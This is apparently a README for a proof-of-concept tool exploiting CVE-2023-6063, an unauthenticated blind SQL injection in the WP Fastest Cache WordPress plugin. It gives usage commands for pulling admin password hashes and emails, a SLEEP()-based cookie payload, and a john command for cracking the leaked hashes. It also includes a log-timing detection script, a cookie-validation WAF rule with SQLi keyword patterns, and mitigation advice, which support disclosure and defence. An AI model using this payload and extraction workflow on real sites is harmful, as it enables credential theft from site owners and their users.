
CVE-2023-6063 PoC — WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection

Source
Associated Vulnerability
Title: WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection (CVE-2023-6063)
Description: The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
Description
A Proof of Concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2.
Readme
# PoC for CVE-2023-6063: WP Fastest Cache 1.2.2 Unauthenticated Blind SQL Injection 

![Static Badge](https://img.shields.io/badge/Python-3.x-%2525233776AB%3Flogo%3Dpython?logo=python)
![Static Badge](https://img.shields.io/badge/License-GPLv3-red?logo=python)
![Static Badge](https://img.shields.io/badge/CVSS-7.5%20(High)-red)

A Proof of Concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2. It extracts hashed passwords (`user_pass`) and emails (`user_email`) from the `wp_users` table by abusing the `wordpress_logged_in` cookie.

## Features
- Time-based data exfiltration (char-by-char) via `SLEEP()` delays.
- Supports custom cookies, target usernames, and hash validation.
- CLI arguments for flexible testing (`--just-hash`, `--just-email`, `--debug`).

This script extracts:
- ☑️ WordPress password hashes (MD5/PHPass).
- ☑️ Associated email addresses.

### Usage

Install the dependencies (if they aren't already installed):
~~~ bash
pip install -r requirements.txt
~~~

Basic usage:
~~~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
~~~

Full options:
~~~
  -h, --help            show this help message and exit
  -u URL, --url URL     Full URL to Wordpress for testing CVE-2023-6063
  --username USERNAME   Define a user to extract its hashed pass
  -d DELAY, --delay DELAY
                        Time for wait web response default 5, minimum 2
  -H HASH, --hash HASH  Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
  --domain DOMAIN       Name of the domain for email validation
  -c COOKIE, --cookie COOKIE
                        Specify a cookie name if it's different on your context
  --status-code STATUS_CODE
                        Use a specific positive status code, default 200
  --debug               More verbosity
  --just-hash           Just extract hashed password
  --just-email          Just extract email value for a user
~~~

## 💻 Demo

This is a demo for the `admin` user:

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Once password hashes have been leaked, use `john` or `hashcat` to crack them with the `PHPass` algorithm, if the password is weak.

John example:
~~~ bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
~~~


# 🕵️‍♂️ Technical Details

## 📖 Vulnerability Description

The WP Fastest Cache plugin (≤1.2.2) for WordPress is vulnerable to an unauthenticated blind SQL injection via the `wordpress_logged_in` cookie. Attackers can exploit this flaw to extract sensitive data (e.g., password hashes, email addresses) from the `wp_users` table by leveraging time-based delays (`SLEEP()`) in SQL queries.

~~~ sql
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
~~~

🚨 Disclaimer: Use this information only for ethical security testing with proper authorization. Unauthorized exploitation is illegal.

- CVE ID: CVE-2023-6063
- Vulnerability Score: 7.5 (High)
- Vulnerability Type: SQL Injection (Blind, Time-Based)
- Affected Software: WP Fastest Cache (WordPress Plugin) ≤ v1.2.2
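
Because the extraction works char-by-char and only a matching guess triggers `SLEEP()`, it leaves a recognisable latency pattern in access logs. The following detection example is added here and is not part of the PoC: it flags clients whose slow responses cluster tightly above one fixed delay while their other requests stay fast. The log layout, thresholds, function name and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from statistics import pstdev

# Assumed log layout (constructed): client IP first, request time in seconds last,
# as produced by appending nginx's $request_time to the access-log format.
LINE = re.compile(r"^(\S+) .*? (\d+\.\d{3})$")


def find_timing_probes(lines, min_delay=2.0, min_slow=4, max_spread=0.5):
    """Return {ip: (slow, total)} for clients whose slow responses share one delay."""
    by_ip = defaultdict(list)
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            by_ip[m.group(1)].append(float(m.group(2)))
    flagged = {}
    for ip, times in by_ip.items():
        slow = [t for t in times if t >= min_delay]
        # Blind extraction mixes fast "false" answers with slow "true" ones, and the
        # slow ones sit just above a fixed SLEEP() value, so their spread is small.
        # A genuinely slow backend gives either all-slow or widely scattered timings.
        if min_slow <= len(slow) < len(times) and pstdev(slow) <= max_spread:
            flagged[ip] = (len(slow), len(times))
    return flagged


# Constructed sample: one probing client, one user on a slow page, one normal user.
SAMPLE_LOG = (
    [f'203.0.113.7 "GET / HTTP/1.1" 200 {t:.3f}'
     for t in (0.041, 5.037, 0.052, 0.048, 5.044, 5.029, 0.039, 5.051)]
    + [f'192.0.2.9 "GET /shop HTTP/1.1" 200 {t:.3f}'
       for t in (2.100, 6.700, 3.900, 9.200, 0.300)]
    + [f'198.51.100.20 "GET / HTTP/1.1" 200 {t:.3f}'
       for t in (0.120, 0.095, 2.800)]
)

if __name__ == "__main__":
    for ip, (slow, total) in find_timing_probes(SAMPLE_LOG).items():
        print(f"{ip}: {slow} of {total} responses delayed by a near-constant interval")
```

The default `min_delay` of 2.0 matches the minimum `--delay` value listed in the tool's help output.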

## 🔍 Attack Vector

- Exploitability: Remote (No authentication required)
- Attack Complexity: Low (Exploitable via crafted HTTP requests)

## 🔥 Impact

- Confidentiality: High (Leaks admin credentials)
- Integrity: None
- Availability: None

## 📌 Affected Versions

- WP Fastest Cache versions ≤1.2.2

## 🛡️ Mitigation

- Upgrade WP Fastest Cache to a version >1.2.2 (v1.2.3 or later).
- Apply WAF rules to block SQLi payloads in cookies.
- **Disable the plugin if unused.**
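
One way to express the WAF rule from the list above, as an added example rather than code from the PoC or the plugin: accept a `wordpress_logged_in` cookie only when its value has the four-field shape WordPress core issues (`user_login|expiry|token|hmac`), and reject everything else. The username charset, the function names and the sample headers are assumptions of this example.

```python
import re
from urllib.parse import quote, unquote

# Shape WordPress core gives this cookie's value: user_login|expiry|token|hmac.
# Assumption: usernames contain only letters, digits, space and _ . - @
VALID_VALUE = re.compile(
    r"[A-Za-z0-9 _.@-]{1,60}\|\d{9,11}\|[A-Za-z0-9]{43}\|(?:[0-9a-f]{40}|[0-9a-f]{64})"
)
# Only labels a rejected value for alerting; the allow-list above is the control.
SQLI_HINTS = re.compile(r"""["'`]|--|/\*|\b(?:sleep|benchmark|select|union)\b""", re.I)

# Constructed samples: a well-formed cookie and the payload quoted on this page.
LEGIT = ("wp_lang=en_US; wordpress_logged_in_" + "0" * 32
         + "=admin%7C1700000000%7C" + "T" * 43 + "%7C" + "ab" * 32)
PAYLOAD = ('" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") '
           "LIKE 'a%', SLEEP(5), 0))-- -")
INJECTED_RAW = "wordpress_logged_in=" + PAYLOAD
INJECTED_ENCODED = "wordpress_logged_in=" + quote(PAYLOAD)
TRUNCATED = "wordpress_logged_in=admin%7C1700000000"


def parse_cookie_header(header):
    """Split a raw Cookie header into (name, value) pairs without decoding."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs


def inspect_request(cookie_header, prefix="wordpress_logged_in"):
    """Return 'allow', 'block-sqli' or 'block-malformed' for one Cookie header."""
    verdict = "allow"
    for name, value in parse_cookie_header(cookie_header):
        if not name.startswith(prefix):
            continue
        decoded = unquote(value)
        if VALID_VALUE.fullmatch(decoded):
            continue  # well-formed: no quotes or SQL syntax can fit this shape
        if SQLI_HINTS.search(decoded):
            return "block-sqli"
        verdict = "block-malformed"
    return verdict


if __name__ == "__main__":
    for sample in (LEGIT, INJECTED_RAW, INJECTED_ENCODED, TRUNCATED):
        print(f"{inspect_request(sample):16} {sample[:48]}")
```

Sites whose usernames fall outside the assumed charset need to widen the first field of `VALID_VALUE` before enforcing the rule.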

## 📚 References
- [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2023-6063)
- [WordPress Plugin Advisory](https://wordpress.org/plugins/wp-fastest-cache/)
- [CVE Details](https://www.cvedetails.com/cve/CVE-2023-6063/)

## ⚖️ Legal

- This script is for educational purposes. Always obtain explicit permission before testing.
